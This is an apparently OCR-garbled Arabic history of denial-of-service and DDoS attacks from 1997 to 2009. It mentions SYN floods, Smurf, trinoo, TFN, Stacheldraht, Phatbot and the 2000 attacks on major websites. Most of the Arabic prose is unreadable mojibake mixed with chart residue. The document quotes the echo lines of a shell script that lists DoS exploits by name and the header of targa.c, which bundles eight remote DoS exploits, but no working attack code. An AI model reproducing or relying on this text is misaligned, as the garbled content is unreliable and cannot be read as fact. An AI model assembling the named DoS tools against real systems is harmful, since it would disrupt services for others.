l^l^kioaV ^nst^ cjli sbVl *>i& di^jj^ai .CERT 3 kml jj l$iL£&l ^5 (li^-V ^jA? ^ 6 SYN flood ^J^*-*^) 

AjI^JI CjI j^VI £>i& ^ikU j .(1^ 4nlni d£j3l 11a ^ ^<JI 

1997 i- 

Jataj J^UIojI t^lj a J .1997 ^ lWj^j 1996 ^ j^jl J IRC J^ cj^j Sj^I 3^aJt cjU^a CjI^j 

f J j .{unpatched) 4 ^ > ^* Jj^j J^xjI jj^I^aII di*^ dip. bonk j boink 'teardrop DoS 
cjU^a .SYN flood c> IRC network Undernet f s ^ill 

(.n.. 11 di> jptel ^ dip. 1997 flc J cj&UI cj^JI jISj . f jJI s^L* J! jj V IRCg dA£^ ^ SYN flood 

.^j jjj' j jW c> ^ ^ <-*3 j-JI <J*l>^ (nonmalicious) 

^ a±^1\ cjIjIa^VI gi L^X^aj ^5 ^JajjoLi (bugs) a jr - j: *Ua^j VI ^ U DoS U!^Ulaj| ^1 < ^>^1 LUj 4 j^VI ^ j^Jl ^Uuulb 
Microsoft Windows TCP/IP stack Ckj^ ^Ua^VI c> <LuLj i^IUa t JILJt .S jj^ialJI Jjii^ull 

dli j Ci^ jc ^ d! >J! p >11 ^JUj ^ di^ Microsoft Windows TCP/IP stack ^ ^ .»l f 
^3 j > ^ cJ^^ ^'3^° uj^ ^ ^3^^ i^j^ TCP/IP stack (jjj-^-a ^ ^jjI^ .J^I^jj I^jI c_ li^j t^j^ > *a (3^^^ ^ <J j^ 3 
L^j^ c^ jaj ^Ij c^ jaj cillil .(start/end/offset conditions) ^Jj^\/^^\f^J^\ ^j^? o-^^ 

'(amplified DoS attack) DoS ^ > ^ '(reflected) u^l^VI Jll^l ^ 1997 ^ Cjj^i <SUi ^^kl 4^ 

^ ^1 ^ jLk ^ jaJI ^l^j jl (jjjia j& cillij ^ > bllb Smurf djU^A .Smurf attack j 

.C/a^ B or/16 network aL^jI^ a<^1 lJ^\ ^> ^jaJI ^1 J^»j J^Uj jl iClass C or 124 network 
.Alidll (broadcast address) ^ c^) f ^ cJ^j]j ^ j.^q^l r^W Jjojj^ q\ ^ ^j^Jl A^li^aj ^ig-<J! ^JL 

<^UJ| jjj^ jl^a. ^l^kl^U ^13 o^j '(Kbpsl4.4 dial-up connection ^cr^ JL^jI ^ 

1998 <4 

Smurf djl (J^IxjII cjI^jjuoII ^^^IxjuIa ^3^^ '^j^^ ^ b^JI^ q±i jjUail! ^jia^c. ^ 

JJ jJ1a£1I ^3^'^ jj;^^ ^3^'^ L>^ Cf^* J 111 ^ ^i^aj <JU3l 6 jia^Ji CLn^S 

^juoijl pjhvi ^jj^^l $ A\ I^j ,A-pjJa3l tjlj^*] Cy* j ^^i*^l o^jlill *L<ij^c. jj^3I ^^>^ djLi^ JLajjV ^ "i^ <J£ <i^. jli j 

DDoS ^Idjj J^ 4998 ^ < ^iio J ^ j j (fapi ^J^j) DDoS djl j^l ^> aJjV! ^-iUull 

4_A^ig_Al3 CjV jlij ^ ^ *j C5^^ sjj".. 1 ^^^Vl (jVl ^ a\\ (j^j '^ij j v Jc ^UucVI V^j .^^L^JI/JiaslSI 

t ji >' ii UfLua jjlJ ^il jll J dj ^IojI j J^ixj <LLouj ^al (Vulnerability-based attacks) <> ^ > ^ 1 ^lill dUp^SI 

^a^Jl C *<!■» > >i Jalij ^al^Jjajlj 4_^L^.Ull <-d^Jl L-Jp^ dil ^jjuj ^aJ .llj^ <9jau£-<Jl (bugs) ^J? "J.^ U^Nfi j. < u. t .q^ jUj ^ 

jI^V d^j£^ L_aL-bl -uilj (fragmented packet vulnerabilities) *\ < *^ >^ 4998 
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( yfki3l ^ JjS ^ l^jjA <OS fingerprinting c^J^ o^) y ^ Jjij&ll fLkjJ ^ 

j 4£fxi ^jiai^l j <*^U> jUlkVI ^1 tilti ^ 4_*jta LLjI a Jataj ^ j ^ j ((packet normalization) 

dljl^j t^laj^ll ^1 j;*^ all ^ 4_jujUja3! q\ Lg£ jaII CllAna] ^JjlLJl dAjjjJa dj jj^ J t^JjuJJ'^Jl ^£jL±^Jj <JaC JaLuUJ 

j& (Jj^j t—fl jjuj ^^lill *L<i^JI c ^ j'xs J 6 * cs-^* ( ♦ 1 * * ^ cl>^ cJ*^ j^*^ t^j^j^iill Ajjjaa j-<J AjMI S j^^JI 

si_>j] ai^j .(Unix shell scripts) o&j* ft^^j sbi <^a DDoS exploits 

^la dia (1998 ( ; ^ t(jjjtfll3 l^j) 'rape tdjIj^Vl s^lj .^Jlxi (jj^il \ $ * & ^jj ^^jII 4_xi^JI < . ^ a ^ ^ <c^juJI 

echo "Editted for use with www.ttol.base.org" 

echo "rapeing $IP. using weapons:" 

echo "latierra " 

echo -n "teardrop v2 " 

echo -n "newtear " 

echo -n "boink " 

echo -n "bonk " 

echo -n "frag " 

echo -n "fucked " 

echo -n "troll icmp " 

echo -n "troll udp " 

echo -n "nestea2 " 

echo -n "fusion2 " 

echo -n "peace keeper " 

echo -n "arnudp " 

echo -n "nos " 

echo -n "nuclear " 

echo -n "ssping " 

echo -n "pingodeth " 

echo -n "smurf " 

echo -n "smurf4 " 

echo -n "land " 

echo -n "jolt " 

echo -n "pepsi " 

^ (exploit packaged) J^jd^i lajju^ <x^jl<Jl djIjI^aVI <L>t£ uj^ c^*^ j 6 (c^^ 

lW> c5^^ (precompiled program) j^ 1 ^multiple DoS exploits ^ l^^t? ^-UuJI jl jaL^I 

^^kl L^judij jjjojVI ^I^jjujI ^l) j/iu^ia <iajaj| ^-^j targa.c < *-^ J i^iLujVij JiJIj ^jj^^^ 

C c5 ^ J 5 ^ 1 t^H e Targa .(Agobot/Phatbot ^ 2003 ^ ^ 



4 https://www.facebook.com/tibea2004 
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/* targa.c - copyright by Mixter <mixter@gmx.net> 

version 1.0 - released 6/24/98 - interface to 8 
multi-platform remote denial of service exploits 

*/ 



/* bonk by routeldaemon9 & klepto 

* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect) 

* land by m31t 

* nestea by humble & ttol 

* newtear by routeldaemon9 

* syndrop by PineKoan 

* teardrop by routeldaemon9 

* winnuke by _eci */ 

CAjLoi^. ~1 iklLujj L. l] laJJ l^jlj 'b^y* <J^ (jg& IP C)\ J^ 0 l . ^ a £ ^ ^-■tu.nJ <JI V targa DoS <— ^-Ia^J Asu J^ 

CjIc j ^ * duUi iCA a^frll i>A& 4_i3l*i S^L^ .( ( ; J <*-^LaJI 4_xJaj|) ^£^jli3l (JjUaJ (jlajc ^ - a3l 4_xJaj| Jc 4ijjjui>» 

t fllla a ^aUaJ 4 ft^t g ^j^J ^ uj (JS tdjLa^Jl (JgUnYl 1 g i£ aJ 4<JL^j!>II "voice bridg€S" L jl IRC ^ ^Ia^JjujL t^lA^l^xJl 

a I laJLujI J a£^j]|j Jjjl^xJl ^Uaill Jj ^ flxjJall Jal j-g (j-a -ja-vlti J 4_jaiij J^j- ullll li& Jl / a c3JJ jaUi S"^-* ^I^JLuAj 

."rootkit" j backdoor 

44 ui,Vi^l j 4 <^)jl A JO^ S^jujUx A a>_nj£ Cj^L^. ^31 4 jj jJJ^I 4_xJaj| 4 a^l g ^ Jc Sj^l J 1999 J 1998 cs^- 0, 

.AjaIUJI iAij^ll cMiAj t^iLJI/^iAxJI CjVU^j! t^iiffl ^ Jlkdl Sijj 4JVI Jj* unit Jl Cij jjjVI c^k ^311 ^Uj ^ 

1999 *t 

<C j^all <Jjoj J^JI jJl J^g-ll (J^-^ J (jg& l!^ 1 U^J*^ C — ^ U* ^ UJJ 1 "J U U2JJ^ ^ 6 1999 J 

4(acjjJI 4^^JI t> jUj^JIj * (scanning) <>aaillj (sniffing) c^iUli <yjj^ Jl^t J) {distributed computing) 
aja^j (.{reconnaissance scanning) ;^U^VI £^ f^Jj 2^ f *^j^l) jIaj^I s^V j s^lc-jj 

ajaxJI 4^SIj1I .(fj^JI ^ SjkuJtj 4 (embedding) u j*^'^ '{compromise) cj^j^VI '{target identification) 

J DDoS iiaiil U (Blasterj 'Lion 'Deloder 'Code Red 'Nimda t JIUI ^jJi u'^' c> 

.DDoS ^ 

.Stacheldrahtj 'Tribe Flood Network (TFN) <trinoo) ^^Jl DoS ^ j^bll ^U^l ^1 j Jj! ^ 1999 ^ 

c^jUi j ^^jj ^1 j Lij^ j£i U£ 4 ((Agent) f^jJIj (Handler) cjUJU-aJI) ^ki^j ^UJI/J^I g*\ jj J£ 

. IRC^' j^j IRC 1999 ^ Ul£ 5^ ^'^1 .DoS ^ ^ j 6 J^i^Vlj 

<ja Loj ji& ^llxJI pLaJI J£ Sj >«Ti<ft\l IRC ^^c- u^ ^3^^ ^u*^*-^ j ^ Aj^I^. ^ IRC ^^^^^ ^ ju^^ ^1 ^jl£ 
cj^j ^1 4trinoo DoS ^ aI^I^I ^j^JI 11a j^J J **1^!>U a^W^ jj^ <slx»UJI ^ aa 1] <jU^3I 

4^j^JI 11a ^ ^jjiiijJaJI 2<500 ^ .IP spoofing ^-y^ 2 ^ UDP c> u^j^ 3 

pUJjj j jqu^H cjI^U^ Vij . nin ^ (rolling attacks) ^ jl^Ji CjU^JI ^ 4U^ J^3 u ^JaJ I ^> 400-100 t> DDoS 

jjjlaj (jjjia cjc- ^1 <luil3 jj3! jjlkd! ji« V {distributed tools) <y jj^^ ^ l^kl^l u^ 

<L j^UI cjI£^JI <JUi JSi ^lou {point-to-point) JJ <^ <> cj! j^I (2000 ^ J ^ j c3^')Internet2 

(j^a^S dlla-a .l^ilfljlj i\ * j L ^ ^ Jl AjullxJl 4_1^jujj ojlilill Al^ui CjULjajiill A^.lj L_flJjJaxJl a iklLujJ jll CjIa^JI 41^1^ 

^jjj (4^3 ^Uaill o^j^ ^r 1 ^ ^j^' cJ^A? ^ L5^b) {Scripting of vulnerability scans) ** > >y\ \ JalSj 

du3 du£ |jj .CjIcLuj ^-xiaJ (jj>^r> J (jjqj^^l (j» cJVVI CjljJaC ^Jj tl_flWl 4C!jUa3I (jljlkl J JjS^J cJ^I djl^^^ l 
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.^^j o^W^ ^ J ^Sniffer 'Backdoor <>? 

V S jj* - gall <c j^ all ^^j^JI (jjjjoLiillj ojj^AxJI 4j£jjoj!>1£3I DoS ^jIj^I ^ laJLujI ;) ^c- j ^ * Jja (JjjjLoj ^^jI! CjIa^JI 

jj^jlill ^ cJj^ ;Ujj£j CjVI^JI £J*^ ^ . NjaViti CjLaJ jUlbj ;4_}j,li3l CjIj^VI ^.Axll (jjoij IgJ (jj^J <J> (j^J 

S^Lja-oJl CjIa^JI lLu\£ .JjUajll AjljojIj d it a^fr ^jjuj J 1^. Clijl^ A-ia ^j;^ s-UakVl C5"^J '(coding efforts) 



jAj s jJI aifcj 1 1999 



^kljl <j!)tk ClL^lj c^Liia jir > (jllaj Jc <illi q\j 6<UjL<u» dlLaaA 



7V/fo Flood Network 2000 (TFN2K) 'Stacheldraht ' Tribe Flood Network (TFN) ^ VM] 

j^i^ CjU^a Shaft ^jj^ ^ j^Vl ji&l I jjIS 

bj ^ jj Jx^ (J^LV! ^ J jV! Sj^ll) CERT 

Ac jjpJI cjU^UI! cilli ^ Uj) [Distributed System Intruder Tools) fU^l ^Jjj cj! j^I aJUJI ^ ^ 6fJ JU ji£ 

J^xJl jj .(<cjjJI a^^1\ jUjaJI djljjlj (.(distributed sniffers) j ju^iul l '(distributed scanners) 

b^ .(C-J^l J^IJ AjL^JjojVI (JJ^ J tdljjljyi A-d^ ^^xi^Ld j t^Uaill J jjjoui j ^JjjjAxJI ^jxi cillj^ o^Astld jlaj d j ^ 3JLauJl ^ laC. ^5^31 j 

ia^ jl(JI ^aJI 6(Ujj 30>) c5jja jUa] ^ t*lb JU^ Jxii bU j ^DDoS ^ ^^13 o^^^ J^a^ c> j J'J^ V 

o^j^JI Sbt cJL£&! i*xt> J^xJI 5-^jj iaia ^xj Ajl tdjtajlLJ! ^ j .(Ujj 180 <) cJ^j^^ ^aJI j (Ujj 180 -30) 
ch 3 j*^^ ls* ; Shaft st^' .Stacheldrahtj 'TFN 'trinoo ts^-^ U-^j 6 jj^^ aI^L* 

(jlasu oLlljl Cllji^. j 6^5^l^Jl iajl^xJl ^^ic <ila>Jl (J jJl j tSAaJLaH jll j tbjjjl ^.L^Jl ^J^^ ^ jll ^j-d 6 jjir > ^> ^I^C-I ^ bLoifl 

^Asu t(( l.ffll j ^LjaJl ^J^Jl AJa DOS J^^ CjVI^jVI jjq ujj Jilxi CjI jj-d CjI j^VI ^j-o A^lflll l!^^^ l!-^ 

^J^J ^ (J^-^^ 4_lx^J (JjS Sj^Vl jll ^^JjoiJj , CjULjajiill ^3^" ^VAstxi ^jc ^^IjVIj C<LqI£1aH <juj^j^3I L_fljUaj 

(t^l jjloaVl Cj^j) LaAic. j J jJdl<Jl t 'a^t ^^Jc. J jj^a^Jl ^ *^J^ UJ^ ^ft^JC- ^UlUj ;4£jJa3l DDoS f L>* 

jjjLj ^1 'IRC £^ j -0 , ^-* a AaaU 4->^>^ J j^-^ DDoS " b L - ) ^ c - j ^ Cy* ^^y^j -^3*^^ ls^\ ^^-^ 

.DDoS £j! c> ^>J^ 

M CA^^1\ JiLd I^jI iAaj ^3 6^ aa^JI . jjg l— iAaj j Y2K ^it£ j j^ii 1^ W^j Uui AjI^jH 
Kilo ^Kj2^1^2^ Year ^ Y) Y2K .^Ijp! ^ u^ullj >J>sh \1&xa ... LjJ fi^ q\± 2000 j»Y2K 

.83 AxLuaib lj j^iUJl ^ j^iaj S^Ia 1983 ^Luali cS j^i^l d^luil ^jjl V^J u-4 kjjail] ^lilluil jf^il J-uaL dna. .(uflil 

(j-a ^jjju j UjLu^ 4-ilkL» jjP j- 00 A^jjlaj n ??? T ♦ ♦ ♦ ^IsJj <-jj< ulaJI n UL& AALuloJ Qjg/nj f Ij^l I^j .CjI nt < in 11 AjI^j ^ 

Jsiuu» ^ !!AJL- AaiS «< 98- = 98- 00 : v ^ ^ ^ 2000 ^ 1998 6^ ^W 1 ^ jtuiluiV! ^! J^c- j! 0l S^iai .JSLUI 

Attack Num 

Size Attach 
(Gbps) -Per Day 



Sitts 



2000 2001 

H 1 

Era: Experimental 



TFN Attack* 
( Ehay r MSFTJ 



DDoS Arsenal 

S*K Spoofed, !CMp. GET, Wng, 
UDP, Bad Protooots, cwi>ecnon 
nood^ Reflection, Application, P2P, 




CNS BacKbcot SQL 



On The Horizon 

Web 2-0, VOIP, IP TV, Cyber 
Terror tem 



https://www.facebook.com/tibea2004 
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2000 i- 

Smurf <jI j^y I^a Oz.net u^j 'o^^lj 'i^W- 43 (ISP) y^*-* ^ '2000 jMj 18 

±± l^j^ jl£ ja^l liA yi jill j^iixJI jl£ (Stacheldraht g^jt <> ICMP Echo reply flood ji) 
s j^ij ^Semaphore c> ^ <^HJI jjjI jll s j^lj ^ 3 ^alaJI jjjI jll $j$aj L-^l j£3j tiaia Oz.net ^Ij^JI 

A kia all <aJaiall Z70 A^Jj^I JJJ* ^J^- y^ J^iiH (jl cA' ^'j^H J^J .UUNET t^-Jl ^ jj* c> j^jl jll 

l,lia. <UajjjuuJl gl\ jxJl jx» ±J^xl\ .Ua L_ DDoS 6 2000 J^l J^ 6 (* J^£^ ^ L>* £jj * »" Q J 1 ^ <^ 

10 £-*) eBay ^Ij^^ ^ > ^ dujliVI 3-^j^ ^ \jj j-* jH j .ciijjlj^U aj.uujj]1 "AjjLaiill ^.UujjVI" j-a j^£1I Ta1xAA\ j 
d£>jl>V! aJLJI <iaLaj jit 4(1999 JjVI <jj^ yi jjIJ uj^ 36) Yahoo ^j^VI '(*^*-ll c> 

jll L_i&ll ^ ja.Ha <(ujO 1.3) Buy.com ^ Jpi\ ^ j^ll 'online brokerage E*Trade 
^ t> AP*^ r^viJ .CNN ti^j j^ui*JI jW^Vl 'Excite.com ^ j^yi -Mjj 'Amazon.com ^ j^VI 

^1 jjV !jj£la li^A Ij^ajl 1 .<-— iUlajll <illj jj3 jlll Ji^ (J^-^ U^ a Jj J ^ ui I (illil 6L_jij^L<ij ^a a dlli JJJ-all ^^>^ £^l J-*H 

Sjta] jjajla^JI j>» -^HaJlj 4 jVI (^5^- Lai cjU^jj ^^Jc I jLI tillil t^Lij jjj^I! dal &a^JI j>i c5^>^^ 

jAU (^ic J?^^ 4(JH<J| J^f^ ^5^- \* jj 6,^1 a JJC. L^J j£ jxi jll c _ 5 -icj tl^a. 4^a.U ~* La j£ AjJa CjLaa^Jl dljl£ ttilli ^xij .^jl 
lju£ j^c-Vl ^^ic Axiisu 6 jAU tcillil 4 a^nj j .CjIcLoj Cj^j SAaI ^ j-<Jl t^lli CIijIj jL^ajl J ja. j j^^aJLauJl 2000 

L_JJj3l CjLa^a jj^ jll j-d I jj£ <lL ^aJ 1^-LQAaJLoLQ jl ( . UjuoJ jV 500'000 J^ 1 L - J J Jud ^' UJ^ (J^^J tl^jl^jlc <JaJ jxi 

jjjx» ^J^. 6jila c _ 5 ic Sj^lS L_flUaxJl ^jl^j ^3 J&\-£ C5^^^J ^JJ CIijujj] 4^^aJLaixJl ^ j^gJl <Ljia .CjU^IcVI J^AaJj j^U 

^1 j^ill CjlLaaaSi ( . n£ <ij j^aLaJI ^ j* .^J^ T ^ 6 ^ <^ cJHll j>» I j^£ I j^ dj^a c^^c jjoJI jjj^I ^^>^ f 

.DDoS f j** 2000 ^ c> jj! jjs j^ ^ cjHI^ cj^j daJ ^U^aJI ^ jU jl£ 
JljU ^ jlLi ljSIII liA "Mafiaboy" . DDoS^W^ ^1 Ul£ j^l Ulc 15 c> ^ ^\ ^ ^ 

j^j j^uaJU 4_Jc; ^Sa. . jaU ^ JjjI ^ill "Project Rivolta" ^ i_ia.U^a Ulc^ 15 cr^^ 

.ii^Vi ju^v jSj^ 

2001 ± 

DNS ^^^1 ls'^j futuresite.register.com {reflection DDoS attack) o£*^\ j-j^ fj** '2001 jAj 
<jja diaj djUlkll ^jAxJI J^j^ ^W^^ -U^ ^j^- ^ f^^^ 5^ DNS ^ W^jV 

^Ui l^iS c_i 36 jq jjaJl CjU jlx-<Jl dlLjjl ^UlU diUiLJl £>i& .DNS C> j-ala. Jlxlj ju£ DNS l5^J ^UauJall 

jjjlij ^aJ^J 64_ijHl ^ d^bUu-a 90 60 1 U ^ IP ^j' J^^ JJ>^^ J^J^^ l^lil .4_iauJal3 

.DNS ^ s^l jll ^11 220 J» DNS ^ gSj- 

^ ja-A ^CJJJ ^^jll till) j-d ^1 ji-aJ L-JXJ> ^\\\ j-d jl£ 66^J^C 

.1^5 jjla ^jj jl c ^idi3 ^Ij JJJ<JI ja. 

c> DNS cjI jLuilual ^ jjll ^Jlx^l sjIc jjaj jl <d t^^UlajVI I^J <jU1uiVI DNS ^ ^ < j->j V <jl t J j^l ji^j 

6 DNS^^ 3 c ^ la J ^ (J^- jbjC'l cillij <jl j^alaJl jj-a jJl (jUaj i _ 5 ^a 6^ ja. jxi jiiJl j-<Jl j-a jju^C dL^lauoj 

aAaji galll JjLaixij <J j£ jjjjJl CjlknlaJj djjljVI iV j^ J^J^ '^blU ^U£3 ;lstxi j^VI Hjj jl ; DNS(*^I ^ ^ ^ ^ ^l^cVlj 

.DoS vulnerabilities ^\ ij 

2001 plfi .I^j fit (jlc I jjjaj ^3 (IRC I j*v^"ij jjill J JSVl jjjUII ^Ja*^ jal j 4DD0S uU^ ^ *^Uj cjj^IojI 
JaxJI 11a ." Inferring Internet Denial-of-Service Activity" u' u^^ : ^ j ' ' jj* ^ 

V <jV J^6-ll J L>^ DDoS -iabjlj jjjUs ^ ^^aJLauJl AjjSjI! .djjjjVI (jUaj ^^ic DDoS Jaljuij jc ^jjlajlb ^IS 

.2000j 1999 

jiasu dlLula .DDoS ^baA tilli ^ LaJ tdjlAa-gil Ijj^la li^A \ fr5l*a CjLd jIslaII Ua. jl jj£j <cUj^ ^ jjWH L — ^ JJ^^ J -0 

LoAic. ^3 jl<JI cJ^Vll $-L_ixlt J>»lxil3 l^jl£djjj ^^Jc ^j^Jall Microsoft ^^^-V * j^jj^^ cs-^* DDoS ^HaA 
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(jlaxJ *l£ij ^-^\ lS^-^> L>^ llA^*^ dl^LaJ CjLo^JI (J^asu 4_aiijli3l ~y gaJ La^jc jl ^-xa jl ^J^. ^cjlo (jc ^-IjSVI 

DDoS (j-a^ jllai 2001 jMj ' J^l lW^ ^ j*«JI ti^V l?^ j 211 ci 1 ^ 1 (J^J^ (> J^Vl ^ jl J*ll 

<jl£ J^-Al ^l^ ^ J?S^ ^ .^.^J dllc JjuJI Aj^lxJl Jjj-Al ^^P" L>^ 4-*-^J J ' " J J^j ^ J^J^^ ♦ (j-a ^-Ij 

jtg-a> c ^aj dijjljVl difl jjoj jjfLLaJ 4 > <al ^ \l DNS ^ ^J^T* (jl 4 qj'q^ V difl jjoj jjfLLa dijjljyi A J^-J f^G- cJj^ > ^ 

a^jl ilia ^J^ 1 J ^aJ .jj* N^l. ^jAslSI (j^Jj L ^ ^aJLud^U djfl jjuij^)fLL<» <£jjuj <J£ LAaC I <ilij a g 1] <jJa^stxJl jllll 

IaaU ^ j^-gJI I^a .<Ac- jl! Jj^v^l 4->/n jj jl jll j^-^ lJjS dikLajl c _^j3I j jp <jjjUc Jl Microsoft ^ ^UujjI 

.Z2 J] (J^^l lW-*^I J^ (JLlfl jjoj jjfLLa <jl£ (_^i3l t ; 4^ jui ^ ^-^J^ 

2002 * 

DDoS ^ j-^a I j * j^>^ ^ ^ti L-i^i L— li^ 2002 ^j-^ 'DDoS <>— ab&^J jj^-la ^>^l ^^Jl &^a J 

jli tillil dujjjVI *v^^* ^ jjiiil ^jajU. DNS .^j^^ (root DNS) ^j^^ DNS ^ 

<J£joij <Uajjjab<i L^judij ^^jI! 4<jj^JI ^! 13 <^ ^ ^ 1 ^ ^ DNS AaII^j ^jjs IgJjcaJ S i^IaSI j^l^ill (j>» ^jAxJI 

13 C> 9 6 ^ J>^1 4il5a^ Jallj ^ .DDoS f C> Injuij jaj ^l^klujU Ajji^Jl ^1 jaJl oi^ ^ 13 Jl DNS J^- 

D^l j <cLoj ^dJjojl j^(gll m ^ j^^l ^.LaJl ^J^^ 
^ jSIj J jJal . J££ ClijliVI g-i J^Ja^ jjjIj i^IUa jlll u J^JI *^ Jj^j DNSlW (5 J^l ^L<u^i3l JjJaL jll L-flS jJ tilli Asuj tJaia 

_AjUl13 6jLja (JjS2 6<il3i ^ j 

2003 ± 

Sjj^ll CjI^I ^ ^jAxJI ^ J j^jII 11a (j^l jj . j^Jaii CjI^j ^1 CjU^iJIj ^ j^JI ^alj^ ^ lj^ V ^j^j ^J 2003 ^ 

,DDoS A^jLulLg (jVI Clla^ai ^^jII j t^jUaill AjljojI jll AjujjoJI 

.(Spam network) ^3*^ ^J^^ (yjj^ ^^f^ ^^j^ 'DDoS tijJ 3 ^^h* q MU'aW ^Vjl 

o^LjaJI ^Sl *^ 4^1^ I j jIaJaldl l t"spambots" ^ 5^.1 ^ (antispam sites) ^fcWfl l o^LJaJ! ^1 jJt jU. U£ 
<i^al jia CjU^a I tW32/Sobig £)\±i£\ j t^Uall DDoS ^ ^I^^Ij ^Uij .(antispam sites) gJ^ll ^jJJ 

# 4jUl13 <^j^<JI ^JLftcV I jjI^ ^-jl ujj^ u^^^ ^^j' 
cjU^I CijjjjVI As^\A\ LJaji dix^ ;CjVUJI .DDoS c5 j^Vl aJUJI ^jI j^JI cjI^j t^JlSl) 

'(2000 J^^J^ J& ^ *^J^^ C5^) W^J^ ^'j^J^' L>^ flWl CjIjj^ (jxi jJ ijic. ^Uj 4^ jJl 

L_JJj ^J-d jLja^.V ^ " b J^ CIjUl^JI a 4 jTjiln j^ii ^JJj CjI Ala ^^^Jc ^ jJali ^^1 J DDoS cJ^^I £y* ^Ia^LojLj 

A ^ > >i j-Al 4_juo£jcL<JI DNS ^"^>A jljC. ^^Jc j .(^ilall) ^Ld^Jl ^^d^Ld CjI^Jjuj (JjJaxA (^^. *^J^ C-ljau] l^i£J j laJJ J-**^ C5^ 
^jJa AJjUui dil (jjuj ^aJ > <C jjjobd (jj^ ^—O&J 3 " a '^.^^ S-^J^^ (>< ^ Ala Sjlils ((JjaJLud^AI (j>» ^jSj ^aJ (j\) L-lau ^11 (j-d <jl£ tlLLoj 

L_flWI CjI jJoC (j>i ^J^ jl j^*^l lV jl-^-G ^-O^- iVl-^Jl (J^axJ ^ 6 C5^>^^ ."S^^V^ J^^J **— ^J^VI (^Z- jLdlll c__lxJ ^al 

.(jlj^VI Jll^l ^ l^j^ y&&) CjIa^JI jl CjIjVj^AI 

|j> ^iV. Ij^-I DDoS ^ 
^-iuiUui l-jUoiV t^lli ^ Uj tAijLaJI CjI jiaJI ^ Liajl ^l^klaj^l ^ DDoS j^U ^3 .mjj^I Jjqnn^l ^ 

J jlaJ IjjJ^a CIaj ' jJaS U jLi 4_ixi^c.yi <juajujja1I SjjjaJI ftUS C5 Jc DDoS f (J^ 3 ) ^ '2003 (J^^>*J^ ^HJ^ 

L— -^>^a l^i^l 6^^^j!l3l (jUaAl (jiajC ^ ^j-<Jl 5-lj^i cJ^-^- (JJ*^ j A ^ Sl jl^-o 6JJ j^Jl SUS ClA jL^. .^-Ac (jiajkll ^aJ (jjJ^J^I 
Clal Ala 4^ jj S^lclj 3 > <al ^ 11 DNS ^ (J<^^ uj c qin-s <il3i ^xjj t^j^jj oA^J ^1 lS^^I S-^J^^ £7* J -0 .f 1 j>^l 

>g _£jj*Vi ^jj l^^^j j^i s^j 

DDoS (SCO's Web site) lsW*-^ 1 s^j ^ 6 j^ 1 J ^'j^ *^ '2003 J 

bj Clljl£ CjUl^JI jL jlijcVI SCO L>^ ^J^'J -O^j^^ L>^ ^jJ 3 djljjil 5-xi^kJl (jUaj <J*^. c5^Al J <A^C- 

<JI JV ^ jj^JVI ^jJI fjz c^l <^ Spamcop j (^ jj^V^ ^ Clickbank '2003 ^ u^ii* ^ 

^^Jc ftj^lS Clljl£ t^aUl <«jJaJ Asu ,^ J^JI iVI uVVI J^JJ La Jc C-Aajuj CjUl^JI .AjjS DDoS I— ib&^J I jjJa^su (^ccj^^ ^J^' 
m A *\ <Jakj ^1 Jj^j (jl Jj3 Jj^Al ^^>^ DDoS ^ J^A dllaL >il ^^jll j SjjJaJx 6jiAa ^** 1 JJ^ 



2004 J- 

^glc S^lj^Ia CIujjj] 2004 J S-^J-^I l— iLaaA ~\ l^Loai ^aJ 4iL < ** )l <g £j £x» ( . lla Jl Lia» 64_JLJl ^ilj^ll dlli CjIa^JI Cj^alai! 

^ jjjj i oJ J UajjJ AS Phfttbot 'AgObot ^J. 1 * ^ ^ U^^^^ ^L<LkjJa Cj t"<K^.* ^Laijj i ^jjQj - ^all L_flWI CjUxj 

,aju Uus Jjj^aiiill (j-G Phatbot c (JjjuJI CjI^jJj J £>i& ^tii CjVI^JI lP 3 *-? J .DDoS ^W^j 3*^ 

super-" J c^iJIj JU^ <> 2000 ^ J ^ ^ ^ dl>uJI <> A L&ys Phatbotj Agobot 
lU*^) Phatbot^lAa ^ j^* cs^^J Love You" jj^ ^ < ^ J^ j c^JI li& ^ j "worm 

^JjUj JL Phatbot) ^l^aJLuiVI 4-1 1 gaUll 3 a al ^ a tjlill ciiu^jll & Jl^VI ls 1c < (u j jj^j <-l^ cs-^ 

Ljajl (>5 £juaiall j diljfli S-l^^ tlajLuo <LL^<Jl ^iiijJaxJl (JjjIjjSL Phatbot Alo .(^al jVI ^al ^Vlml (jC Cjl <uLlJ j 

iiiiill ajII J ^^1<JI Jtl^VI J&l c> s^l j ^ Phatbot '(Phatbot ^±5 ^^j^ (J&j^ 3 lf) 

> (<J aj LLj| jj) DDoS ^ (> ^] uVl W) jMj cs^j (automation) 

2005 J- 

^ jl 40000 € ^ £ jj^ U jL> jllj jaxx.de jl ^ 2005 l>^' J -y?^ jV^ 1 <^jh ^ ^ 

.jaLolaII DDoS 

2006 J- 

^IS t^jj^JUi cJ^A^ c3j^ dia^jjoj! DDoS Cy> aJjuoLoj ojUc ^^Aj .4_iij^3I djlcU^JI ^y* ^ jj* 1 DDoS ^ daj 

U^<i ^^ic AiLjaV (jj^lUi U^jj ^ botnet u -0 ciulS Ui^ic. t jjI^js 23 ^— i^^ajj j^^^>^ 15 

2007jJ—yJ ^ 

.^U oAxJ Uj jluit ^ jLk IP (jJjU^ J jj^a jll cilill diVl^ j ^> ^AsJ! <^J^3 S^J^ DDoS 

2008 * 

5JI jj L_J jJJ jJ! ^j-d J^^^ L_llla dlla t^lxJl (J?\j^\ e>\S±i\ ^glc J ga^i] jlll j^a a <C j^^ a dj^La. 2008 J^-^ 30 

< '^A^JJ cJ^-l (J^^l ~ laJLuJJ ^\ (jjaij ~\ Ikloiij ^JjJ ^ilalilU <C d^A dulfi Cilia _ jj jlaJ (j-a 

Jjoic. (Jjj^c (jj^la (jc U^. jl jijUjaJI (jjjlil! ilijj" ^jl£ .ciiS jll ^jiiil ^11* jjc. 6 jW-> c^iJIj 'Scientology.org i^LujIj 

.Cji jll ^J^ 3 ^-lld JJC. j-<Jl l5*^ l$'A\ J 

.(Conficker) WjI j^V 1 c>^ ^ j ^ J^ 1 cr 13 ^ j j ^ (i ) '2008 jf^^ 30 

^jljlkU aIS Cilia jjojjj£jU» (Jjxjoij ^ AiaJl ^jAslSI ^ L_0stjJa3l Jallj J^iij 

■ijj^ u' ^ cr^'-J ( -^^ 4> botnet ^ j j^j^f^l ^j*^' -^jj m^^' l> 

2009 ± 

. (s^Ul ^LVjll ^ <_D£i^l f jj Uk) 2009 jJjj 4 ^ cjL^l j> JjVl ^ j-ll cjS^ ;The July Cyber Attacks 
